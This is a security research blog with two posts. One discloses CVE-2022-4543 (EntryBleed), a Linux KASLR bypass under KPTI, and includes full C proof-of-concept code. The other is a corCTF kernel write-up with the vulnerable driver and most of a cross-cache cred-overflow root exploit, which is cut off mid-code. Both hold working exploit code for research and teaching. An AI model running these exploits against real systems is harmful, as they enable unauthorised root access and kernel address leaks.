Search This Blog

Friday, December 16, 2022

EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”

KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”

Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup_64):

#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL_LOWER_BOUND 0xffffffff80000000ull #define KERNEL_UPPER_BOUND 0xffffffffc0000000ull #define entry_SYSCALL_64_offset 0x400000ull uint64_t sidechannel(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN_START KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset #define SCAN_END KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset #define DUMMY_ITERATIONS 5 #define ITERATIONS 100 #define ARR_SIZE (SCAN_END - SCAN_START) / STEP uint64_t leak_syscall_entry(void) { uint64_t data[ARR_SIZE] = {0}; uint64_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { for (uint64_t idx = 0; idx < ARR_SIZE; idx++) { uint64_t test = SCAN_START + idx * STEP; syscall(104); uint64_t time = sidechannel(test); if (i >= DUMMY_ITERATIONS) data[idx] += time; } } for (int i = 0; i < ARR_SIZE; i++) { data[i] /= ITERATIONS; if (data[i] < min) { min = data[i]; addr = SCAN_START + i * STEP; } printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]); } return addr; } int main() { printf ("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset); }

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H,  i7-9700F, i7-9750H, Xeon(R) CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I'm not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see edit in the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.

In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.

Tuesday, August 16, 2022

Reviving Exploits Against Cred Structs - Six Byte Cross Cache Overflow to Leakless Data-Oriented Kernel Pwnage

Last year in corCTF 2021, D3v17 and I wrote two kernel challenges demonstrating the power of msg_msg: Fire of Salvation and Wall of Perdition. These turned out to be a really powerful technique which have been repeatedly utilized in real world exploits.

For this year’s edition, we followed a similar trend and designed challenges that require techniques seen before in real world exploits (and not CTFs). I wrote Cache of Castaways, which requires a cross cache attack against cred structs in its isolated slabs. The attack utilized a simplistic and leakless data-only approach applicable in systems with low noise. D3v17 wrote CoRJail, which requires a docker escape and a novel approach of abusing poll_list objects for an arbitrary free primitive through its slow path setup.

For my challenge, a standard CTF kernel setup was given along with the kernel compilation config. SMAP, SMEP, KPTI, KASLR, and many other standard kernel mitigations were on - I even disabled msg_msg for difficulty’s sake. The kernel version used was 5.18.3, booted with 1 CPU and 4 GBs of RAM. You can download the challenge with the included driver in the corCTF 2022 archive repo.

Here is the source of the CTF driver (I did not provide source during the competition as reversing this is quite simple): 

#include <linux/kernel.h> #include <linux/module.h> #include <linux/device.h> #include <linux/mutex.h> #include <linux/fs.h> #include <linux/slab.h> #include <linux/miscdevice.h> #include <linux/uaccess.h> #include <linux/types.h> #include <linux/random.h> #include <linux/delay.h> #include <linux/list.h> #include <linux/vmalloc.h> #define DEVICE_NAME "castaway" #define CLASS_NAME "castaway" #define OVERFLOW_SZ 0x6 #define CHUNK_SIZE 512 #define MAX 8 * 50 #define ALLOC 0xcafebabe #define DELETE 0xdeadbabe #define EDIT 0xf00dbabe MODULE_DESCRIPTION("a castaway cache, a secluded slab, a marooned memory"); MODULE_LICENSE("GPL"); MODULE_AUTHOR("FizzBuzz101"); typedef struct { int64_t idx; uint64_t size; char *buf; }user_req_t; int castaway_ctr = 0; typedef struct { char pad[OVERFLOW_SZ]; char buf[]; }castaway_t; struct castaway_cache { char buf[CHUNK_SIZE]; }; static DEFINE_MUTEX(castaway_lock); castaway_t **castaway_arr; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static long castaway_add(void); static long castaway_edit(int64_t idx, uint64_t size, char *buf); static struct miscdevice castaway_dev; static struct file_operations castaway_fops = {.unlocked_ioctl = castaway_ioctl}; static struct kmem_cache *castaway_cachep; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { user_req_t req; long ret = 0; if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req))) { return -1; } mutex_lock(&castaway_lock); switch (cmd) { case ALLOC: ret = castaway_add(); break; case EDIT: ret = castaway_edit(req.idx, req.size, req.buf); break; default: ret = -1; } mutex_unlock(&castaway_lock); return ret; } static long castaway_add(void) { int idx; if (castaway_ctr >= MAX) { goto failure_add; } idx = castaway_ctr++; castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT); if (!castaway_arr[idx]) { goto failure_add; } return idx; failure_add: printk(KERN_INFO "castaway chunk allocation failed\n"); return -1; } static long castaway_edit(int64_t idx, uint64_t size, char *buf) { char temp[CHUNK_SIZE]; if (idx < 0 || idx >= MAX || !castaway_arr[idx]) { goto edit_fail; } if (size > CHUNK_SIZE || copy_from_user(temp, buf, size)) { goto edit_fail; } memcpy(castaway_arr[idx]->buf, temp, size); return size; edit_fail: printk(KERN_INFO "castaway chunk editing failed\n"); return -1; } static int init_castaway_driver(void) { castaway_dev.minor = MISC_DYNAMIC_MINOR; = DEVICE_NAME; castaway_dev.fops = &castaway_fops; castaway_dev.mode = 0644; mutex_init(&castaway_lock); if (misc_register(&castaway_dev)) { return -1; } castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); if (!castaway_arr) { return -1; } castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); if (!castaway_cachep) { return -1; } printk(KERN_INFO "All alone in an castaway cache... \n"); printk(KERN_INFO "There's no way a pwner can escape!\n"); return 0; } static void cleanup_castaway_driver(void) { int i; misc_deregister(&castaway_dev); mutex_destroy(&castaway_lock); for (i = 0; i < MAX; i++) { if (castaway_arr[i]) { kfree(castaway_arr[i]); } } kfree(castaway_arr); printk(KERN_INFO "Guess you remain a castaway\n"); } module_init(init_castaway_driver); module_exit(cleanup_castaway_driver);

There are only two ioctl commands. One for adding a chunk (all objects in the driver are of size 512 bytes), and one for editing a chunk, which has a clear 6 byte overflow. Only 400 allocations total are given. As per last year, none of the bugs in our kernel challenges are extremely difficult to find, as we wanted to focus on exploitation difficulty.

Under normal circumstances, a 6 byte overflow in a kernel object should be quite exploitable. However, the given object is allocated in an isolated slab cache, created with the flags SLAB_PANIC | SLAB_ACCOUNT. Combined with the fact that I compiled with CONFIG_MEMCG_KMEM support, allocations from this cache will be in its own separate slab away from other generic kmalloc-512 allocations, as duasynt documents. Else, the kernel can alias this cache with others sharing similar properties based on the find_mergeable function, (actually this would still not be a problem in this challenge because I disabled CONFIG_SLAB_MERGE_DEFAULT).

Not only is there freelist randomization and hardening, but the Linux kernel has also moved freelist pointers to the middle. The driver’s object also has neither pointers nor function pointers. How can one exploit this six byte overflow?

The answer is cross cache overflows. I found resources on this strategy quite scarce, and haven’t personally seen a CTF challenge that requires it. This technique is increasingly common in real world exploits as evidenced by CVE-2022-27666 or StarLabs kctf msg_msg exploit for CVE-2022-0185. Other articles that inspired this idea was grsecurity’s post on AUTOSLAB and this post on kmalloc internals. Funny enough, there was also another CVE discussing cross cache the day right before our CTF began: CVE-2022-29582.

Those articles talk about this technique in greater detail, so I advise you to read them beforehand.

To summarize on my end, kmalloc slab allocations are backed by the underlying buddy allocator. When there are either no slabs or available chunks in requested kmalloc cache, the allocator requests an order-n page from the buddy allocator - it calls new_slab, leading to allocate_slab. This triggers a page request from the buddy allocator with alloc_page in alloc_slab_page

/* * Slab allocation and freeing */ static inline struct slab *alloc_slab_page(gfp_t flags, int node, struct kmem_cache_order_objects oo) { struct folio *folio; struct slab *slab; unsigned int order = oo_order(oo); if (node == NUMA_NO_NODE) folio = (struct folio *)alloc_pages(flags, order); else folio = (struct folio *)__alloc_pages_node(node, flags, order); if (!folio) return NULL; slab = folio_slab(folio); __folio_set_slab(folio); if (page_is_pfmemalloc(folio_page(folio, 0))) slab_set_pfmemalloc(slab); return slab; }

The buddy allocator maintains an array of FIFO queues for each order-n page. An order-n page is just a chunk of size page multiplied by 2 to the power of n. When you free a chunk and it results in a completely empty slab, the slab allocator can return the underlying page(s) back to the buddy allocator.

The order for the underlying slab pages depends on a multitude of factors, including size of slab chunks, system specifications, and kernel builds - in practice, you can easily determine it by just looking at /proc/slabinfo (pagesperslab field). For this challenge, the chunks with isolated 512 byte objects require order-0 pages.

An important insight for cross cache overflows and page allocator level massage is the behavior of buddy allocators when a requested order’s queue is empty. In this case, the buddy allocator attempts to find a page from order n+1 and splits it in half, bringing these buddy pages into order n. If such a higher order buddy page does not exist, it just looks at the next order and so forth. When a page returns to the buddy allocator and its corresponding buddy page is also in the same queue, they are merged and move into the next order’s queue (and the same process can continue from there).

In many previous cross cache overflow exploits, the pattern is to overflow from a slab without known abusable objects onto a slab with abusable objects. It is also possible to abuse this cross cache principle for UAF bugs too. Most known exploits rely on target objects in pages greater than order 0 due to the lesser amounts of noise there and improved stability. However, this doesn’t make cross-cache overflows onto order 0 pages impossible, especially if system noise is low. Order 0 would be a nice target because it would unlock even more abusable objects in this system, like the famous 128 byte sized cred struct. For those unfamiliar with the cred object, it basically determines process privileges within the first few qwords.

I recall that one of my earliest memories in kernel exploitation was learning that rooting a system by overflowing a cred struct is impossible because of its slab isolation in the cred_jar cache. Once I learned about cross-cache, I knew I just had to write a challenge to see if attacking cred structs are feasible.

The high level strategy of my exploit is the following: drain the cred_jar so future allocations pull from the order 0 buddy allocator, drain many higher order pages into order 0 sized pages, free some in a manner that avoids buddy page merging, spray more cred objects, free more held pages, and finally spray allocations of the vulnerable object to overflow onto at least one cred object (the vulnerable object page must be allocated right above a cred slab). The nice thing about this approach is its elegance - KASLR leaks, arbitrary read/write, and ROP chains are not needed! It is a simple, leakless, and data-only approach!

To trigger cred object allocations, one just needs to fork. Though a standard fork does cause a lot of noise as other allocations do occur, this does not matter for the initial spray in my exploit.

As the driver has a limited amount of 512 byte allocations (only 400 total, so about 50 pages as there are 8 per slab) and has no freeing option, a better page spraying primitive is required. The trick here generally is to just look for functions that reference page allocator functions, such as __get_free_pages, alloc_page, or alloc_pages. D3v17 mentioned a really nice one to me based upon a page allocating primitive from CVE-2017-7308 documented in this p0 writeup. If you use setsockopt to set packet version to TPACKET_V1/TPACKET_V2, and then use the same syscall to initialize a PACKET_TX_RING (which creates a ring buffer used with PACKET_MMAP for improved transmission through userspace mapped buffers for packets), then you will hit this line in packet_setsockopt. Note that the p0 writeup used PACKET_RX_RING, but PACKET_TX_RING gives us the same results for the purposes of page allocator control.

case PACKET_RX_RING: case PACKET_TX_RING: { union tpacket_req_u req_u; int len; lock_sock(sk); switch (po->tp_version) { case TPACKET_V1: case TPACKET_V2: len = sizeof(req_u.req); break; case TPACKET_V3: default: len = sizeof(req_u.req3); break; } if (optlen < len) { ret = -EINVAL; } else { if (copy_from_sockptr(&req_u.req, optval, len)) ret = -EFAULT; else ret = packet_set_ring(sk, &req_u, 0, optname == PACKET_TX_RING); } release_sock(sk); return ret; }

This case calls packet_set_ring using the provided tpacket_req_u union, which then calls alloc_pg_vec. The arguments here utilize the tpacket_req struct pulled from the union, as well as the order based on the struct’s tp_block_size. In this latter function, it calls alloc_one_page_vec tp_block_nr of times, which leads to a __get_free_pages call.

static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec; int i; pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; out_free_pgvec: free_pg_vec(pg_vec, order, block_nr); pg_vec = NULL; goto out; 


What the above primitive gives us is the ability to drain tp_block_nr number of order n (where n is determined by tp_block_size) pages and to free tp_block_nr amount of pages by closing the socket fd. The only issue is that default low privileged users can’t utilize these functions in the root namespace, but we can usually make our own unprivileged namespaces in many Linux systems. There are definitely alternative methods to drain pages (and most likely ones without needing namespaces). Another approach to page draining would be to repeatedly spray object allocations (like msg_msg which I disabled), though it might be less reliable if it is in a shared slab.

Another important point to address now for the exploit is on the noise fork (or clone with equivalent flags) causes. Everytime you fork, many allocations (from both kmalloc and buddy allocator) occurs.

The core function for process creation is kernel_clone. Keep in mind that a traditional fork has no flags set in kernel_clone_args. The following then happens:

1. kernel_clone calls copy_process

2. copy_process calls dup_task_struct. This allocates a task_struct from its own cache (relies on order 2 pages in target system). Then, it calls alloc_thread_stack_node, which will use __vmalloc_node_range to allocate a 16kb vrtually contiguous region for kernel thread stack if no cached stacks are available. This usually will allocate away 4 order 0 pages.

3. The above vmalloc call allocates a kmalloc-64 chunk to help setup the vmalloc virtual mappings. Following this, the kernel allocates two vmap_area chunks from vmap_area_cachep. For this system and kernel, there were 2, with the first from alloc_vmap_area. I am not completely sure where the second vmap_area chunk allocation was triggered from - I suspect it came from preload_this_cpu_lock. Debugging confirms this hypothesis on this setup and shows that it does not hit the subsequent free path.

4. Then copy_process calls copy_creds, which triggers a cred object (our desired target) allocation from prepare_creds. This occurs as long as the CLONE_THREAD flag isn’t set.

int copy_creds(struct task_struct *p, unsigned long clone_flags) { struct cred *new; int ret; #ifdef CONFIG_KEYS_REQUEST_CACHE p->cached_requested_key = NULL; #endif if ( #ifdef CONFIG_KEYS !p->cred->thread_keyring && #endif clone_flags & CLONE_THREAD ) { p->real_cred = get_cred(p->cred); get_cred(p->cred); alter_cred_subscribers(p->cred, 2); kdebug("share_creds(%p{%d,%d})", p->cred, atomic_read(&p->cred->usage), read_cred_subscribers(p->cred)); inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1); return 0; } new = prepare_creds(); if (!new) return -ENOMEM;

5. Starting from this section of copy_process, a series of copy_x functions (where x is some process attributes) begins. All of them will trigger an allocation, unless its respective CLONE flag is set. In a normal fork, one would expect a new chunk to be allocated from files_cache, fs_cache, sighand_cache, and signal_cache. The source of the largest noise comes from the setup of mm_struct, which triggers as long as CLONE_VM isn’t set. This in turn triggers a lot of memory allocation activity, in caches like vm_area_struct, anon_vma_chain, and anon_vma. All of these allocations here are backed by order 0 pages on this system.

    retval = copy_semundo(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_security;
    retval = copy_files(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_semundo;
    retval = copy_fs(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_files;
    retval = copy_sighand(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_fs;
    retval = copy_signal(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_sighand;
    retval = copy_mm(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_signal;
    retval = copy_namespaces(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_mm;
    retval = copy_io(clone_flags, p);
    if (retval)
        goto bad_fork_cleanup_namespaces;
    retval = copy_thread(clone_flags, args->stack, args->stack_size, p, args->tls);
    if (retval)
        goto bad_fork_cleanup_io;

6. Lastly, the kernel allocates a pid chunk - its slab requires an order 0 page.

There are definitely more details and steps I missed, but the above should suffice for the context of this writeup. The utilized cache properties might also be different depending on slab mergeability and required page sizes for other systems.

Ignoring page allocations from calls like vmalloc and just looking at slab allocations, a single fork would trigger this pattern in this system: 

task_struct kmalloc-64 vmap_area vmap_area cred_jar files_cache fs_cache sighand_cache signal_cache mm_struct vm_area_struct vm_area_struct vm_area_struct vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct vm_area_struct pid

Based on our source analysis earlier on, and the clone manpage, I managed to drastically reduce this noise with the following flags: CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND. Now, cloning only produces these series of slab allocations:

task_struct kmalloc-64 vmap_area vmap_area cred_jar signal_cache pid

Note that there will still be the 4 order 0 page allocations from vmalloc as well. Regardless, this noise level is much more acceptable. The only issue now is that our child processes cannot really write to any process memory as it’s sharing the same virtual memory, so we have to use shellcode dependent on only registers to check for successful privilege escalation.

Knowing all of this, we can formulate an exploit now.

Using the initial setsockopt page spray technique, I requested many order 0 pages and freed one out of every two of them. I will now have a lot of order 0 pages that will not be coalesced into order 1 pages. I had the initial exploit fork into a separate privileged user namespace in order to utilize these page level spraying primitives.

Then, I called clone many times with the above flags to trigger the creation of cred objects, freed remaining order 0 pages, and sprayed allocations of the vulnerable object to create a scenario where one page of vulnerable objects are on of a cred objects page. Note that this isn’t structured in a way that follows the allocation behavior seen in fork exactly - we would be allocating adjacent to all the above objects reliant on order 0 (pages for vmalloc, pid slab, vmap_area slab, etc.) However, the differences should eventually align properly against a cred slab (and it turned out that it did!) to create the adjacency scenario. I would assume the overflow has also hit other chunks, which might result in horrible crashes, but I rarely experienced this - I am not exactly sure why this is the case.

I overflowed all of the vulnerable objects with the following payload: 4 bytes that represent 1 and 2 bytes that represents 0. This first 4 bytes is to keep the usage field sane for kernel checks, while the second 2 bytes will zero out the uid field (as Linux uids don’t go over 65535). After this overflow spray, I pipe a message to all the forks - they in turn will check their uid and drop a shell if it is root.

Below is my final exploit, which effectively has a 100% success rate.

#define _GNU_SOURCE #include <stdio.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <sched.h> #include <assert.h> #include <time.h> #include <sys/socket.h> #include <stdbool.h> #define ALLOC 0xcafebabe #define DELETE 0xdeadbabe #define EDIT 0xf00dbabe #define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND typedef struct { int64_t idx; uint64_t size; char *buf; }user_req_t; struct tpacket_req { unsigned int tp_block_size; unsigned int tp_block_nr; unsigned int tp_frame_size; unsigned int tp_frame_nr; }; enum tpacket_versions { TPACKET_V1, TPACKET_V2, TPACKET_V3, }; #define PACKET_VERSION 10 #define PACKET_TX_RING 13 #define FORK_SPRAY 320 #define CHUNK_SIZE 512 #define ISO_SLAB_LIMIT 8 #define CRED_JAR_INITIAL_SPRAY 100 #define INITIAL_PAGE_SPRAY 1000 #define FINAL_PAGE_SPRAY 30 typedef struct { bool in_use; int idx[ISO_SLAB_LIMIT]; }full_page; enum spray_cmd { ALLOC_PAGE, FREE_PAGE, EXIT_SPRAY, }; typedef struct { enum spray_cmd cmd; int32_t idx; }ipc_req_t; full_page isolation_pages[FINAL_PAGE_SPRAY] = {0}; int rootfd[2]; int sprayfd_child[2]; int sprayfd_parent[2]; int socketfds[INITIAL_PAGE_SPRAY]; int64_t ioctl(int fd, unsigned long request, unsigned long param) { long result = syscall(16, fd, request, param); if (result < 0) perror("ioctl on driver"); return result; } int64_t alloc(int fd) { return ioctl(fd, ALLOC, 0); } int64_t delete(int fd, int64_t idx) { user_req_t req = {0}; req.idx = idx; return ioctl(fd, DELETE, (unsigned long)&req); } int64_t edit(int fd, int64_t idx, uint64_t size, char *buf) { user_req_t req = {.idx = idx, .size = size, .buf = buf}; return ioctl(fd, EDIT, (unsigned long)&req); } void debug() { puts("pause"); getchar(); return; } void unshare_setup(uid_t uid, gid_t gid) { int temp; char edit[0x100]; unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); temp = open("/proc/self/setgroups", O_WRONLY); write(temp, "deny", strlen("deny")); close(temp); temp = open("/proc/self/uid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", uid); write(temp, edit, strlen(edit)); close(temp); temp = open("/proc/self/gid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", gid); write(temp, edit, strlen(edit)); close(temp); return; } // __attribute__((naked)) pid_t __clone(uint64_t flags, void *dest) { asm("mov r15, rsi;" "xor rsi, rsi;" "xor rdx, rdx;" "xor r10, r10;" "xor r9, r9;" "mov rax, 56;" "syscall;" "cmp rax, 0;" "jl bad_end;" "jg good_end;" "jmp r15;" "bad_end:" "neg rax;" "ret;" "good_end:" "ret;"); } struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0}; char throwaway; char root[] = "root\n"; char binsh[] = "/bin/sh\x00"; char *args[] = {"/bin/sh", NULL}; __attribute__((naked)) void check_and_wait() { asm( "lea rax, [rootfd];" "mov edi, dword ptr [rax];" "lea rsi, [throwaway];" "mov rdx, 1;" "xor rax, rax;" "syscall;" "mov rax, 102;" "syscall;" "cmp rax, 0;" "jne finish;" "mov rdi, 1;" "lea rsi, [root];" "mov rdx, 5;" "mov rax, 1;" "syscall;" "lea rdi, [binsh];" "lea rsi, [args];" "xor rdx, rdx;" "mov rax, 59;" "syscall;" "finish:" "lea rdi, [timer];" "xor rsi, rsi;" "mov rax, 35;" "syscall;" "ret;"); } int just_wait() { sleep(1000000000); } // int alloc_pages_via_sock(uint32_t size, uint32_t n) { struct tpacket_req req; int32_t socketfd, version; socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); if (socketfd < 0) { perror("bad socket"); exit(-1); } version = TPACKET_V1; if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { perror("setsockopt PACKET_VERSION failed"); exit(-1); } assert(size % 4096 == 0); memset(&req, 0, sizeof(req)); req.tp_block_size = size; req.tp_block_nr = n; req.tp_frame_size = 4096; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { perror("setsockopt PACKET_TX_RING failed"); exit(-1); } return socketfd; } void spray_comm_handler() { ipc_req_t req; int32_t result; do { read(sprayfd_child[0], &req, sizeof(req)); assert(req.idx < INITIAL_PAGE_SPRAY); if (req.cmd == ALLOC_PAGE) { socketfds[req.idx] = alloc_pages_via_sock(4096, 1); } else if (req.cmd == FREE_PAGE) { close(socketfds[req.idx]); } result = req.idx; write(sprayfd_parent[1], &result, sizeof(result)); } while(req.cmd != EXIT_SPRAY); } void send_spray_cmd(enum spray_cmd cmd, int idx) { ipc_req_t req; int32_t result; req.cmd = cmd; req.idx = idx; write(sprayfd_child[1], &req, sizeof(req)); read(sprayfd_parent[0], &result, sizeof(result)); assert(result == idx); } void alloc_vuln_page(int fd, full_page *arr, int page_idx) { assert(!arr[page_idx].in_use); for (int i = 0; i < ISO_SLAB_LIMIT; i++) { long result = alloc(fd); if (result < 0) { perror("allocation error"); exit(-1); } arr[page_idx].idx[i] = result; } arr[page_idx].in_use = true; } void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz) { assert(arr[page_idx].in_use); for (int i = 0; i < ISO_SLAB_LIMIT; i++) { long result = edit(fd, arr[page_idx].idx[i], sz, buf); if (result < 0) { perror("free error"); exit(-1); } } } int main(int argc, char **argv) { int fd = open("/dev/castaway", O_RDONLY); if (fd < 0) { perror("driver can't be opened"); exit(0); } // for communicating with spraying in separate namespace via TX_RINGs pipe(sprayfd_child); pipe(sprayfd_parent); puts("setting up spray manager in separate namespace"); if (!fork()) { unshare_setup(getuid(), getgid()); spray_comm_handler(); } // for communicating with the fork later pipe(rootfd); char evil[CHUNK_SIZE]; memset(evil, 0, sizeof(evil)); // initial drain puts("draining 